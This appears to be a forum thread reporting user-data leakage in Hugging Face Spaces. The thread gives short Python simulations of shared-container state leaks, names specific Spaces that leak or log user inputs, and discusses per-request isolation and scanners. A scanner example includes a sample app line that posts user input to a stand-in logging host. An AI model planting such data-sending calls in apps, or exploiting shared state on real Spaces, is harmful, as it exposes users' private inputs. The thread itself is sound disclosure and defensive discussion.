While exploring Spaces, I discovered that they operate in a containerized environment that is designed around per-app isolation rather than per-user isolation. This raises concerns about potential security risks, specifically data leakage between users.
Consider this example: I have a Space (Shell, a Hugging Face Space by juppytt) that runs shell commands based on user input. If one user writes a file with `echo "secret" > testfile`, another user can later read that same file with `cat testfile`, recovering what the previous user wrote.
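The underlying behavior can be simulated in a few lines of Python: because every request runs in the same container, all "users" see one shared filesystem. (The handler name and directory below are hypothetical, just to illustrate the shared state.)

```python
# Simulation of the shared-container filesystem: every request,
# regardless of which user sent it, operates on the same directory.
import tempfile
from pathlib import Path

SHARED = Path(tempfile.gettempdir()) / "space-shared"  # hypothetical shared dir
SHARED.mkdir(exist_ok=True)

def run_command_for_user(action):
    # Stand-in for the Space executing a user's shell command.
    return action(SHARED)

# User A: echo "secret" > testfile
run_command_for_user(lambda d: (d / "testfile").write_text("secret"))

# User B, in a separate request: cat testfile
print(run_command_for_user(lambda d: (d / "testfile").read_text()))  # -> secret
```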
From public Spaces, I found several repositories that might permit the leakage of user data. Here are some examples:
https://huggingface.co/spaces/awacke1/CB-GR-Chatbot-Blenderbot : Clicking the ‘Respond and Retrieve Messages’ button reveals the input of other users.
https://huggingface.co/spaces/awacke1/GradioAutoCSVLoaderToPlotly : The graph displayed on the right side contains a record of previous user inputs.
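Both of these leaks follow the same shared-state pattern: because all users share one app process, any module-level variable persists across requests. A minimal sketch (a hypothetical handler, not these Spaces' actual code):

```python
# Module-level state survives across requests because every user
# is served by the same long-lived process.
history = []

def respond(user_input):
    history.append(user_input)
    # Returning the accumulated history exposes earlier users' inputs.
    return list(history)

# User A submits a message; user B's later request sees it:
respond("alice private prompt")
print(respond("bob says hi"))  # -> ['alice private prompt', 'bob says hi']
```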
Moreover, it’s not just inter-user data leakage that is of concern. Certain Spaces themselves pose a risk of exposing user data to arbitrary third parties.
https://huggingface.co/spaces/jeevavijay10/nlp-goemotions-senti-pred : Every time a user submits data, the input gets logged and then transmitted to a remote database repository.
https://huggingface.co/spaces/productizationlabs/ContactForm : This Space collects user contact information and stores it in memory. While this application only stores the sensitive data, it’s worth noting that a similar application could just as easily transmit that data over the network.
With these potential security risks, are there discussions or plans going on to improve security in Spaces and ensure user data stays private? Would love to hear your thoughts!
Thanks for the extensive and valuable feedback. We appreciate it and are open to ideas on how to empower users to make their apps more secure.
Also, our Hub offers a webhooks feature. If you’re interested, you could explore building bots or scanners that notify app owners about potential vulnerabilities.
We are facing two problems here:
- User input can be leaked or exposed to other users.
- User input can be secretly logged and transferred to the app developer or other parties.
The first problem could be solved fairly directly by creating a new container for each user request, though this would incur additional performance overhead. Some Spaces also deliberately rely on users sharing a single container, particularly when implementing user-populated leaderboards. If compatibility with such Spaces has to be preserved, there would need to be limited, explicit channels for sharing data across users.
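The per-request isolation idea can be sketched as follows: each request runs against a fresh, throwaway working directory, so nothing one user writes is visible to the next. (Illustrative only; real isolation would use a new container or microVM per request, not just a temp directory.)

```python
import tempfile
from pathlib import Path

def handle_request(run):
    # Each request gets its own scratch area, destroyed when the
    # request finishes -- a stand-in for a per-request container.
    with tempfile.TemporaryDirectory() as scratch:
        return run(Path(scratch))

# User A writes a file; it dies with A's sandbox:
handle_request(lambda d: (d / "testfile").write_text("secret"))

# User B cannot read it back:
print(handle_request(lambda d: (d / "testfile").exists()))  # -> False
```

The trade-off mentioned above shows up here too: a leaderboard Space could not accumulate scores under this model without an explicit, audited shared store.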
Regarding the second problem, preventing all forms of data leakage is currently extremely challenging, since Spaces accept arbitrary code. While complete prevention is out of reach, bots or scanners can analyze the code and monitor the runtime behavior of Spaces to detect unsafe data flows. This can help mitigate the risks, although bypasses and false alerts remain possible. A more principled solution, such as data-flow tracking, may well emerge in the future.
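As a rough illustration of what such a scanner could look like, here is a static check built on Python's `ast` module that flags outbound network calls (e.g. `requests.post`) in a Space's source. It is a heuristic only: trivial to bypass and prone to false alerts, exactly as noted above, and the list of suspect calls is an assumption for the sketch.

```python
import ast

# Calls we treat as potential exfiltration points (illustrative list).
SUSPECT_CALLS = {("requests", "post"), ("requests", "get")}

def find_network_calls(source):
    """Return (line, call) pairs for suspicious module.attr(...) calls."""
    hits = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call) and isinstance(node.func, ast.Attribute):
            if isinstance(node.func.value, ast.Name):
                key = (node.func.value.id, node.func.attr)
                if key in SUSPECT_CALLS:
                    hits.append((node.lineno, f"{key[0]}.{key[1]}"))
    return hits

app_code = '''
import requests
def predict(text):
    requests.post("https://example.com/log", json={"input": text})
    return "ok"
'''
print(find_network_calls(app_code))  # -> [(4, 'requests.post')]
```

A notification bot could run a check like this on every pushed revision and open an issue on the Space when it fires, leaving the judgment call to the app owner.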
For an open web-application platform like Hugging Face, it’s crucial to provide a systematic solution that clearly defines how user data is used. Many Spaces currently operate on user credentials such as API keys, usernames, passwords, and input prompts. However, it is quite unclear how these are used, and the system by its nature carries the risk of data breaches through malicious or vulnerable Spaces.